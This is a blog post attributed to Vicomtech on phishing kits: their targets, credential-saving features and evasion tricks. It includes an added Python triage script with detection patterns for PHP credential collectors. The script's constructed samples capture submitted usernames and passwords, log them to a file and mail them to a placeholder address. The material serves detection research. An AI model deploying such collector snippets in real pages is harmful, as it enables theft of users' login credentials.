Written by Vicomtech

Over the past few decades, Internet access has skyrocketed—from just 20% of the global population in 2005 to 67% in recent years [1]. That means 5.5 billion people are now online. With this massive expansion, protecting users and their data has become a growing concern for law enforcement agencies, researchers, and companies.

As more people connect to the digital world, the risks they face have increased as well. One of the most prevalent threats in this environment is phishing. Phishing is a type of fraud based on social engineering that aims to deceive users into revealing sensitive data—like login credentials or bank account information. Attackers often imitate the websites of well-known companies, prompting users to enter personal information.

Given the widespread adoption of the Internet, it is no surprise that phishing has evolved into one of the most common cyberattacks globally. The Anti-Phishing Working Group (APWG) reported 932,923 phishing attacks in Q3 of 2024 [2]. Social media platforms were the most targeted sector, accounting for 30.5% of all phishing attacks, followed by webmail with 21.2%.

Who Are Phishers Targeting?

According to APWG, about 74% of phishing attacks target financial institutions, SaaS platforms, webmail, social media, payment services, and e-commerce websites. This suggests that phishers carefully select high-value targets to increase their financial gain through mass attacks.

To effectively exploit these targets, attackers rely on well-crafted strategies to deceive users. Launching a phishing website involves two main steps: first, setting up a server that can host the attack (sometimes with an SSL certificate), and second, creating a URL and HTML content that mimics a trusted website.

Phishing Kits: The Silent Force Behind Scalable Attacks

Traditionally, phishing attacks required considerable manual effort and technical expertise, making them less accessible to inexperienced attackers. However, one of the most dangerous developments in recent years is phishing kits—pre-packaged tools that let attackers easily and quickly create phishing websites [3]. These kits include everything needed to deploy an attack: fake websites, scripts for collecting stolen data, and automation features that make phishing more effective and scalable.

What makes phishing kits particularly threatening is the range of built-in features designed to streamline data theft. Phishing kits often include features to save credentials: (i) as plain text, (ii) via emails sent to the attacker, or (iii) through web-based dashboards that show the stolen credentials. These features allow attackers to operate at scale with minimal effort.
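For analysts triaging a recovered kit, the three saving features above can be turned into a first-pass static check. The following is an added example, not code from the original article or from any cited project: it assumes the kit's server-side scripts are PHP, treats database storage as a stand-in for the dashboard feature, and its function names, patterns and sample scripts are constructed for illustration.

```python
import re

# Heuristic indicators for the three credential-saving features named above.
# Assumption: kit scripts are PHP; these are illustrative triage rules,
# not a complete signature set.
CHANNELS = {
    "plain_text_file": re.compile(r"\b(?:file_put_contents|fwrite|fputs)\s*\(", re.I),
    "email": re.compile(r"\b(?:mail|mb_send_mail)\s*\(", re.I),
    # Assumption: a dashboard reads from a database the collector writes to.
    "dashboard_store": re.compile(
        r"\bINSERT\s+INTO\b|\b(?:mysqli_query|pg_query)\s*\(|->\s*prepare\s*\(", re.I),
}
USER_INPUT = re.compile(r"\$_(?:POST|GET|REQUEST)\b")
BLOCK_COMMENT = re.compile(r"/\*.*?\*/", re.S)

def strip_comments(source: str) -> str:
    """Drop /* */ blocks and whole-line // or # comments so dead code is ignored."""
    source = BLOCK_COMMENT.sub("", source)
    kept = [ln for ln in source.splitlines()
            if not ln.lstrip().startswith(("//", "#"))]
    return "\n".join(kept)

def classify_exfil(source: str) -> set[str]:
    """Return the saving channels a script appears to use for submitted form data."""
    code = strip_comments(source)
    if not USER_INPUT.search(code):  # never reads form input: not a collector
        return set()
    return {name for name, rx in CHANNELS.items() if rx.search(code)}

# Constructed samples (not taken from any real kit).
SAMPLES = {
    "collect.php": '<?php $u = $_POST["user"]; $p = $_POST["pass"];\n'
                   'file_put_contents("log.txt", "$u:$p\\n", FILE_APPEND);\n'
                   '// mail($to, "x", $u);\n'
                   'mail("box@example.invalid", "new", "$u:$p"); ?>',
    "save.php": '<?php $stmt = $db->prepare("INSERT INTO hits (u, p) VALUES (?, ?)");\n'
                '$stmt->execute([$_POST["user"], $_POST["pass"]]); ?>',
    "contact.php": '<?php /* mail($_POST["a"], "s", "b"); */ echo "thanks"; ?>',
}

def triage(samples: dict[str, str]) -> dict[str, list[str]]:
    """Map each script name to the sorted list of channels it matches."""
    return {name: sorted(classify_exfil(src)) for name, src in samples.items()}

if __name__ == "__main__":
    for name, channels in triage(SAMPLES).items():
        print(f"{name}: {', '.join(channels) or 'no collector behaviour'}")
```

A match is a triage signal rather than a verdict: a legitimate contact form that mails submitted input matches the `email` rule too, so hits still need manual review.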

Can Phishing Kits Really Avoid Detection?

Yes—and that’s part of what makes them so dangerous. Many kits use obfuscation techniques to make detection harder for researchers and authorities [4], as well as cloaking mechanisms that filter out unwanted traffic or redirect certain users [3]. These features allow phishing websites to stay online longer and evade traditional detection tools. In doing so, they change not just how attacks are carried out, but the entire phishing lifecycle.

We Need to Take Phishing Kits Seriously

Phishing is no longer a simple scam—it’s a highly automated, evolving crime enabler powered by tools like phishing kits. These kits allow attackers to move fast, hit hard, and avoid detection [5]. As phishing attacks become more targeted and sophisticated, the need for better detection methods and robust datasets grows more urgent.

If we want to stay ahead of cybercriminals, we need to understand their tools, build smarter defenses, and support ongoing research efforts. The fight against phishing isn’t just a technical challenge.

[1] – We Are Social, Digital 2025, 2025. URL: https://wearesocial.com/uk/blog/2025/02/digital-2025/, last accessed: April 29, 2025.
[2] – Anti-Phishing Working Group (APWG), Phishing activity trends report, 3rd quarter 2024. URL: https://apwg.org/trendsreports/, last accessed: March 5, 2025.
[3] – H. Bijmans, T. Booij, A. Schwedersky, A. Nedgabat, and R. van Wegberg, “Catching phishers by their bait: Investigating the Dutch phishing landscape through phishing kit detection,” in Proc. 30th USENIX Secur. Symp. (USENIX Secur.), 2021, pp. 3757–3774.
[4] – A. A. Orunsolu and A. S. Sodiya, “An anti-phishing kit scheme for secure web transactions,” in Proc. 3rd Int. Conf. Inf. Syst. Secur. Privacy, Jan. 2017, pp. 15–24.
[5] – F. Castaño, E. F. Fernández, R. Alaiz-Rodríguez, and E. Alegre, “PhiKitA: Phishing kit attacks dataset for phishing websites identification,” IEEE Access, vol. 11, 2023, pp. 40779–40789.